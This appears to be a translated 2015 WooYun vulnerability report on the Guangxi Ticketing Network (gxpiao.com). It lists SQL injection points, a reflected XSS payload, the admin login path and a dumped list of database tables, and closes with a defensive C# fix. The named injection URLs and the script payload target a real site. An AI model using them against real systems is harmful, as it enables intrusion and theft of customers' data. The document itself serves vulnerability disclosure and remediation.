
Vulnerability summary

Defect ID: wooyun-2015-0110881

Title: Guangxi Ticketing Network (广西票务网) SQL injection + reflected XSS; millions of records exposed, many accounts hold spendable balances

Vendor: 广西票务网 (Guangxi Ticketing Network)

Author: 路人甲

Submitted: 2015-04-29 21:15

Fix time: 2015-06-13 21:16

Public disclosure: 2015-06-13 21:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-04-29: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-06-13: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection, XSS, user data exposure

Detailed description:

Injection points (the dyyid and dybm query-string parameters):
http://www.gxpiao.com/Movie_page1.aspx?dyyid=1
http://www.gxpiao.com/Movie_page2.aspx?dybm=1

[Screenshots: 1.jpg, 2.jpg]


Reflected XSS (the dyyid parameter is echoed into the page unencoded):
http://www.gxpiao.com/Movie_page1.aspx?dyyid="><script>alert(/乌云/)</script>

[Screenshot: 4.jpg]


Admin backend:
http://www.gxpiao.com/manage/login.aspx

Proof of vulnerability:

Columns of the merchant-account view, as dumped: 商家名称 (merchant name), 商家类型 (merchant type), 密码 (password), 权限 (privilege), 用户名 (username)
Database: gxpwdb
[252 tables]
+----------------------------+
| AppDownInfo |
| AppFeedBack |
| AppMobileCount |
| AppMobileLog |
| AppMobileLogin |
| AppMobilePoLogin |
| AppPrizeList |
| AppPrizeRecord |
| AppPrizeUser |
| CM_CG_Fjb |
| CM_CG_Fpd |
| CM_CG_FpdMx |
| CM_CG_SpcfMx |
| CM_CG_Spcfd |
| CM_CG_Sppc |
| CM_CG_SpzzMx |
| CM_CG_Spzzd |
| CM_CG_dd |
| CM_CG_ddMx |
| CM_CG_fkd |
| CM_CG_fkdMx |
| CM_CG_pdd |
| CM_CG_pddMx |
| CM_CG_thd |
| CM_CG_thdMx |
| CM_CK_CkdMx |
| CM_CK_Ckdb |
| CM_CK_Rkdb |
| CM_CK_Yj |
| CM_CK_ckd |
| CM_CK_dbd |
| CM_CK_dbdMx |
| CM_CK_rkd |
| CM_CK_rkdMx |
| CM_CW_Gdzcgl |
| CM_CW_Zcd |
| CM_CW_Zjsrd |
| CM_CW_Zzd |
| CM_CW_cwkm |
| CM_Jxc_Gysfl |
| CM_Jxc_Gysxx |
| CM_Jxc_Khfl |
| CM_Jxc_Khxx |
| CM_Jxc_Spfzb |
| CM_Jxc_Splb |
| CM_Jxc_Spxx |
| CM_Jxc_Spzzb |
| CM_OA_Bwl |
| CM_OA_Skk |
| CM_OA_Ss |
| CM_OA_Ssap |
| CM_OA_Ssfj |
| CM_OA_Txfs |
| CM_OA_Ygssb |
| CM_Qt_XS_Hyjfkj |
| CM_Qt_XS_Hykjb |
| CM_Qt_XS_Hykzl |
| CM_Qt_XS_Khda |
| CM_Qt_XS_Qtjjb |
| CM_Qt_XS_Qtth |
| CM_Qt_XS_QtthMx |
| CM_Qt_XS_Qtxs |
| CM_Qt_XS_QtxsMx |
| CM_Qt_XS_Qtxsdp |
| CM_XS_Fpd |
| CM_XS_FpdMx |
| CM_XS_Kpd |
| CM_XS_KpdMx |
| CM_XS_xsckd |
| CM_XS_xsckdMx |
| CM_XS_xsdd |
| CM_XS_xsddMx |
| CM_XS_xsskd |
| CM_XS_xsskdMx |
| CM_XS_xsthd |
| CM_XS_xsthdMx |
| CM_Xtrz |
| CM_Xtrzxm |
| CM_Yj_Gyszkye |
| CM_Yj_Khzkyj |
| CM_ZtManagement |
| D99_CMD |
| D99_Tmp |
| JC_Airport |
| Jb_Rygw |
| Jc_Bm |
| Jc_Button |
| Jc_Ck |
| Jc_Dw |
| Jc_Dy_CK_Bm |
| Jc_Dy_Menu_Button |
| Jc_Dy_Role_System |
| Jc_Dy_Users_Gw |
| Jc_Dy_Users_Role |
| Jc_GnWeb |
| Jc_Jmgxx |
| Jc_Kjqj |
| Jc_Mj |
| Jc_Role |
| Jc_Ryda |
| Jc_Rygwb |
| Jc_System |
| Jc_SystemMenu |
| Jc_Users |
| Jc_Xtcs |
| Jc_YhGzzm |
| Jc_YhZc |
| Jc_airtype |
| M_Advertis |
| M_AdvertisType |
| M_AgenPrice |
| M_ApplyDetailTable |
| M_ApplyTable |
| M_Area |
| M_Code |
| M_Cuxiao |
| M_Ddlczt |
| M_Ddlczt_bak |
| M_Ddzt |
| M_Fapiao |
| M_Fenxiao_Mb |
| M_Fenxiao_Mb_Mx |
| M_Fenxiao_log |
| M_Fenxiao_sjjg |
| M_Flight |
| M_HomePageCfg_UnWork |
| M_HomePageCfg_UnWork2 |
| M_HomePageCfg_Working |
| M_HomePageCfg_Working2 |
| M_HotelInfo |
| M_HotelInfo_JD |
| M_HotelInfo_JD_Mx |
| M_HotelInfo_Mx |
| M_Integral |
| M_Member |
| M_Member_bank |
| M_Menpiao |
| M_Menpiao_Mx |
| M_Menpiao_hd |
| M_Movie |
| M_MovieSite |
| M_MovieTicket |
| M_MovieTime |
| M_Movie_Mx |
| M_Perform |
| M_Perform_Config |
| M_Perform_cc |
| M_Perfrom_JD |
| M_Perfrom_JD_MX |
| M_Perfrom_jw |
| M_Perfrom_yccg |
| M_Psfs |
| M_QA |
| M_SecondBuy |
| M_Spdz |
| M_Splike |
| M_Substation |
| M_UserCollect |
| M_Voucher |
| M_Voucher_MX |
| M_Xianlu_hd |
| M_Zcsx |
| M_about |
| M_airline_JD |
| M_airline_JD_Mx |
| M_airline_JD_PNR |
| M_airline_Xx |
| M_codeMachine |
| M_dianzipiao |
| M_dianzipiao_Mx |
| M_hotSearch |
| M_inMoney |
| M_member_money |
| M_member_moneyCash |
| M_member_value |
| M_menpiao_JD |
| M_menpiao_JD2 |
| M_menpiao_JD_Mx |
| M_menpiao_JD_Mx2 |
| M_merchant |
| M_merchant_group |
| M_merchant_user |
| M_message |
| M_mooncake |
| M_mooncake_Dst |
| M_mooncake_FL |
| M_mooncake_JD |
| M_mooncake_JD_MX |
| M_movieTicket_JD |
| M_movieTicket_JD_Mx |
| M_project |
| M_qpdj |
| M_subject |
| M_telList |
| M_xianlu |
| M_xianlu_JD |
| M_xianlu_JD_Mx |
| M_xianlu_Mx |
| M_xianlu_back |
| M_ycyd |
| NFCUser |
| N_News |
| SMS |
| SMS_MO |
| SMS_MO_meeting |
| SMS_meeting |
| Sys_Table_No |
| UV_CM_CG_dd |
| UV_CM_CG_rkd |
| UV_CM_GnQx |
| UV_Fenxiao_MX |
| UV_GXPW_Pay |
| UV_Jc_Users |
| UV_Menu_Button |
| UV_Moon_Pay |
| UV_MovieTicket_JD |
| UV_MovieTicket_Time |
| UV_Order_recycling |
| UV_Perform_Phone |
| UV_Perfrom_JD |
| UV_Ry |
| UV_Splb_Spxx |
| UV_Spxx_Spfzb |
| UV_User_Orders |
| UV_User_menpiao |
| UV_User_xianlu |
| UV_Users_Role |
| UV_airticket |
| UV_airticket_caiwu |
| UV_menpiao_JD_Count_report |
| UV_menpiao_JD_report |
| UV_menpiao_jd_fenxiao |
| UV_message |
| UV_perform_All |
| UV_perform_cg |
| UV_perfrom_jd_MX |
| UV_user_mooncake |
| UV_user_qpdj |
| View_1 |
| View_2 |
| View_3 |
| View_ycmc |
| View_商家账号 |
| W_JingDian_OnlineCfg |
| W_SUBSTATION_CFG |
| W_SubStation_Pos |
| YoungTb |
| audit_table |
| buser |
| errCode |
| m_JD_number |
| vM_menpiao_hd |
+----------------------------+

[Screenshots: 1.jpg, 2.jpg, 3.jpg, 4.jpg, 5.jpg]

Fix recommendation:

Filter the input.
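The report lists three findings on one ASP.NET Web Forms page: a query-string value (dyyid) reaching SQL, the same value reflected into the HTML response, and an exposed admin login. The following is an added example, not code from the report or from gxpiao.com, of how the first two are closed in the page's code-behind: the id is validated as an integer, sent to SQL Server as a typed parameter rather than concatenated into the query text, and HTML-encoded on the way back out. The connection-string name "gxpw", the table M_Movie's column names (the table name itself appears in the dumped list), and the label controls lblTitle and lblId are assumptions for illustration.

```csharp
// Added example (not the site's own code). Assumptions: an ASP.NET Web Forms page
// Movie_page1.aspx with the query-string parameter dyyid from the report, a connection
// string named "gxpw", a table M_Movie with an int column dyyid and a Title column,
// and two Label controls lblTitle and lblId declared in the .aspx markup.
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web;
using System.Web.UI;

public partial class Movie_page1 : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        // 1. Validate: dyyid is a numeric id, so anything that is not a positive integer
        //    is rejected before it can reach SQL or the response body. This alone would
        //    have stopped both the injection and the reflected payload shown in the report.
        int dyyid;
        if (!int.TryParse(Request.QueryString["dyyid"], out dyyid) || dyyid <= 0)
        {
            Response.StatusCode = 400;
            Response.End();
            return;
        }

        // 2. Parameterize: the value travels as a typed SqlParameter. The vulnerable pattern
        //    this replaces is string concatenation such as
        //    "... WHERE dyyid = " + Request.QueryString["dyyid"].
        string connStr = ConfigurationManager.ConnectionStrings["gxpw"].ConnectionString;
        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(
            "SELECT TOP 1 Title FROM M_Movie WHERE dyyid = @dyyid", conn))
        {
            cmd.Parameters.Add("@dyyid", SqlDbType.Int).Value = dyyid;
            conn.Open();
            object title = cmd.ExecuteScalar();

            // 3. Encode on output: the reflected XSS exists because the raw parameter was
            //    written into HTML. Everything that comes from the request or the database
            //    is HTML-encoded before it is assigned to a control.
            lblTitle.Text = HttpUtility.HtmlEncode(title == null ? "" : title.ToString());
            lblId.Text = HttpUtility.HtmlEncode(dyyid.ToString());
        }
    }
}
```

The same three steps apply to dybm on Movie_page2.aspx. The exposed /manage/login.aspx is a separate issue that parameterization does not address; restricting it by network location or putting it behind an additional authentication layer is the usual mitigation, and the dumped merchant-account view shows why the password column there should hold salted hashes rather than recoverable values.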

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively declined to respond

Vulnerability Rank: 15 (WooYun rating)